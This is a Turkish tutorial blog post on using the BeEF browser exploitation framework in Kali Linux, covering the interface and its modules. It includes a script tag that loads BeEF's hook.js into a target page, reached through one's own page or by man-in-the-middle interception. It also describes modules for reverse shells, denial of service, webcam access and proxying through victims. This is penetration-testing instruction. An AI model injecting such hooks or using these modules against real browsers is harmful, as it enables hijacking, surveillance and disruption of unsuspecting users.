BEEF NEDİR?
BeEF, Browser Expoitation Framework’ün kısaltmasıdır. BeEF saldırgan tarafından hazırlanan hook.js dosyasının hedef tarayıcı üzerinde çalıştırılması durumunda tarayıcıya bağlanarak hem web sitesine hem de tarayıcıya sızma testlerinin yapılmasını sağlamaktadır.
NASIL KULLANILIR?
BeEF Kali Linux’ta hazır olarak bulunmaktadır. BeEF’i ekrandaki kısayolundan veya terminalden beef-xss yazarak çalıştırabilirsiniz. Uygulamayı çalıştırdığınızda tarayıcınızda açılacak olan login ekranında kullanıcı adı ve parola kısmına varsayılan olarak tanımlı olan beef/beef değerini girmeniz gerekmektedir. Kullanıcı adı, parola, kullanılan veritabanı ve eklentileri ayarlamak için Kali’de varsayılan olarak usr/share/beef-xss/ klasöründe bulunan config.yaml dosyasında değişiklik yapılması gerekmektedir.
Uygulamaya giriş yaptıktan sonra bizi başlangıç ekranı karşılamaktadır. Bu sayfada BeEF’i denemek için hazırlanmış demo sayfalarına ulaşabilirsiniz. Ayrıca sayfada bulunan Hook Me! linkini sık kullanılanlar çubuğuna ekleyerek herhangi bir sayfada tıklamanız durumunda o sayfayı BeEF’e bağlayabilirsiniz. Kendi yazdığınız ya da Man in the Middle yaptığınız bir sayfaya BeEF’i eklemek isterseniz <script type=”text/javascript” src=”http://127.0.0.1:3000/hook.js”></script> satırını src kısmını BeEF’in çalıştığı IP’ye karşılık gelecek şekilde değiştirerek sayfanın HTML kodlarına ekleyebilirsiniz.
Hedef tarayıcıyı BeEF’e bağlayarak Hooked Browser bölümünde üzerine tıkladığımızda karşımıza bağladığımız tarayıcı hakkında bilgiler bulunan Details sekmesi gelmektedir. Bu sekmenin yanında sırası ile tarayıcıda ne yapıldığını detaylı olarak gösteren Logs, tarayıcıya gönderilebilecek komutların olduğu Commands, tarayıcıyı proxy olarak kullanmak için Rider, tarayıcıda açık olan sayfada XSS testleri yapabilmek için XssRays, interaktif shell ile BeEF’i kontrol etmek için Ipec, ağ bilgilerini görüntülemek için Network ve bağlı tarayıcıların birbiriyle iletişimini sağlamak için WebRTC sekmeleri bulunmaktadır.
COMMANDS
Komutlar sekmesinde bulunan modüller ile bağlanılan tarayıcıya komutlar gönderebilmekteyiz. Bu modüllerden bazıları ile hedef sistemde kalıcılık sağlamak, hedef sistemin bulunduğu ağı taramak veya sisteme tam erişim sağlamak mümkün olabilmektedir. Kullanımı işe yarayabilecek bazı modüller aşağıdaki gibidir:
Persistence: Man-In-The-Browser
Bu modül ile kullanıcı bulunduğu sitede kaldığı sürece tarayıcı ile olan bağlantının aktif kalması sağlanmaktadır. Ancak kullanıcı adres çubuğundaki adresi değiştirirse bağlantı kopmaktadır.
Exploits: RFI Scanner
Bağlı sayfada Remote File Inclusion açıklarını test etmektedir.
Exploits: Shell Shock
Shell Shock açığını kullanarak tersine shell almayı denemektedir.
Network: DOSer
Sonsuz GET ve POST isteklerini hedef URL’ye yollayarak denial of service saldırısı yaptırmaktadır.
Browser: Webcam Permission Check
Kullanıcıya belirtmeden kamera izninin verilip verilmediğini kontrol etmektedir. İznin verilmiş olması durumunda Webcam modülü ile kullanıcının görüntüsünü almak mümkün olmaktadır.
RİDER
Rider sekmesinde hedef tarayıcıyı proxy olarak kullanmamızı ve tarayıcıda yönlendirmeler yapabilmemizi sağlayan eklenti bulunmaktadır. Bu eklenti ile hedef tarayıcıyı proxy olarak kullanmak için Hooked Browsers bölümündeki tarayıcıya sağ tıklayarak “Use as Proxy” seçeneğine tıklanmalıdır. Ardından kullanılan tarayıcının proxy ayarlarından 127.0.0.1 ip adresi ve 6789 portunu kullanarak proxyi kullanabilirsiniz. Forge Request sekmesinden bağlı tarayıcıdan istediğiniz sayfaya HTTP isteği yapılmasını sağlayabilirsiniz. Proxy ve Forge Request ile yapılan tüm istekler ve cevapları History sekmesinde listelenecektir.
XSSRAYS
XssRays sekmesinde hedef tarayıcının bulunduğu sayfada Xss zaafiyeti bulunup bulunmadığı kontrol edilebilmektedir. Bu eklentiyi XssRays sekmesinin Scan Config sekmesinden Start Scan butonu ile Hooked Browsers bölümünde üzerinden test yapmak istediğiniz adrese sağ tıklayarak Launch XssRays on Hooked Domain elemanını seçerek kullanabilirsiniz. Eklentinin tarayıcının bulunduğu sayfada XSS zafiyeti bulması durumunda bulunan zafiyet Logs sekmesinde listelenecektir.
0 Comments